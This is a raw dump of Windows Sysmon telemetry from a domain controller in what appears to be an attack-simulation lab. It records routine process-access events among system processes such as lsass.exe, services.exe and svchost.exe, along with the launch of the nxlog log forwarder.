10:40:09.924{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1200-000000007F01}1208C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001194Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.918{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001193Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.918{733EE690-3DF7-5F80-0B00-000000007F01}8681096C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001192Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.917{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001191Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.917{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001190Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.917{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001189Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.917{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001188Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.917{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001187Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.917{733EE690-3DF7-5F80-0B00-000000007F01}8681096C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001186Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.917{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001185Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.917{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001184Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.916{733EE690-3DF7-5F80-0B00-000000007F01}8681096C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001183Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.904{733EE690-3DF7-5F80-0A00-000000007F01}8522568C:\Windows\system32\services.exe{733EE690-3E09-5F80-2B00-000000007F01}2732C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001182Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.903{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2B00-000000007F01}2732C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001181Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.899{733EE690-3DF7-5F80-0500-000000007F01}6442420C:\Windows\system32\csrss.exe{733EE690-3E09-5F80-2D00-000000007F01}2896C:\Program Files (x86)\nxlog\nxlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001180Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.899{733EE690-3DF7-5F80-0A00-000000007F01}8521120C:\Windows\system32\services.exe{733EE690-3E09-5F80-2D00-000000007F01}2896C:\Program Files (x86)\nxlog\nxlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+12bee|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2b9ae|C:\Windows\SYSTEM32\ntdll.dll+29bc4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001179Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.898{733EE690-3E09-5F80-2D00-000000007F01}2896C:\Program Files (x86)\nxlog\nxlog.exe-----"C:\Program Files (x86)\nxlog\nxlog.exe" -c "C:\Program Files (x86)\nxlog\conf\nxlog.conf"C:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=EDE0FA11A10EF649A05AC992D0231673,SHA256=B66FA8592904D8502747C78C79D5B3E86C9ED7383A8159209BB2740BB92070EC,IMPHASH=517158273EC1C6D5E65120E91DD2284A{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001178Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.897{733EE690-3DF7-5F80-0500-000000007F01}6441144C:\Windows\system32\csrss.exe{733EE690-3E09-5F80-2B00-000000007F01}2732C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001177Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.897{733EE690-3DF7-5F80-0A00-000000007F01}8522564C:\Windows\system32\services.exe{733EE690-3E09-5F80-2B00-000000007F01}2732C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+52f1|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2b9ae|C:\Windows\SYSTEM32\ntdll.dll+29bc4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001176Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.895{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001175Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.895{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001174Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.895{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001173Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.895{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001172Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.888{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3E09-5F80-2A00-000000007F01}2444C:\Windows\System32\spoolsv.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001171Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.888{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3E09-5F80-2A00-000000007F01}2444C:\Windows\System32\spoolsv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001170Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.884{733EE690-3DF7-5F80-0A00-000000007F01}8521116C:\Windows\system32\services.exe{733EE690-3E09-5F80-2A00-000000007F01}2444C:\Windows\System32\spoolsv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001169Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 